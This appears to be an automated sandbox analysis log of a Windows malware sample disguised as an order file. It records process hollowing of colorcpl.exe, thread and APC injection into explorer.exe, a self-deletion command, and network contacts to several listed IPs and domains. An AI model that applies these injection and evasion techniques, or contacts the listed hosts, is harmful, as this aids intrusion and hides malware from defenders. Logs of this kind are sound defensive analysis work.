          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04529080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04529100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04529100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04529100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04544120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04544120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04544120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04544120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04544120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04552990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.82.149.10 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeDomain query: www.goproteinz.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.dehaochu.com
          Source: C:\Windows\explorer.exeDomain query: www.gammacake.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeMemory written: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 1A0000
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeProcess created: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe'
          Source: explorer.exe, 00000003.00000002.610807709.0000000004F80000.00000004.00000001.sdmp, colorcpl.exe, 00000008.00000002.599102146.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.597811426.00000000008B8000.00000004.00000020.sdmp, colorcpl.exe, 00000008.00000002.599102146.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.355587968.0000000000EE0000.00000002.00000001.sdmp, colorcpl.exe, 00000008.00000002.599102146.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000003.00000000.355587968.0000000000EE0000.00000002.00000001.sdmp, colorcpl.exe, 00000008.00000002.599102146.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
